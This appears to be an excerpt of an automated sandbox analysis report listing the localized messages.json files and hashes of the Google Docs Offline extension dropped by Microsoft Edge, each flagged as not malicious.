                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):884
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                                                                        MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                                                                        SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                                                                        SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                                                                        SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):980
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                                                                        MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                                                                        SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1941
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                                                                        MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                                                                        SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                                                                        SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1969
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                                                                        MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                                                                        SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                                                                        SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1674
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                                                                        MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                                                                        SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                                                                        SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                                                                        SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1063
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                                                                        MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                                                                        SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                                                                        SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1333
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                                                                        MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                                                                        SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                                                                        SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                                                                        SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1263
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                                                                        MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                                                                        SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                                                                        SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1074
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                                                                        MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                                                                        SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):879
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                                                                        MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                                                                        SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                                                                        SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1205
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                                                                        MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                                                                        SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                                                                        SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):843
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                                                                        MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                                                                        SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                                                                        SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):912
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                                                                        MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                                                                        SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                                                                        SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                                                                        SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):11280
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.752941882424501
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvVpfcNLFev:m8IEI4u8ROxev
                                                                                                                                                                                                                                                                                                                                                        MD5:F897300492E3AB467E56883D23D02D77
                                                                                                                                                                                                                                                                                                                                                        SHA1:DECD6DC9E70ECCF9B45983147680614C019B99EA
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F9B3A5747DEDCB5AED58FCFC0F4FD3BD2F2E903F2CCEF90A92A73DBC0F8C3DBD
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B8AC574E24814BAF04A264E7F3F00B4285CD7B66104DFC77897440A898FCA5230775300EC7DEF723678975A04C2CD1BC73A44F77DA26262E8704029930990C62
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
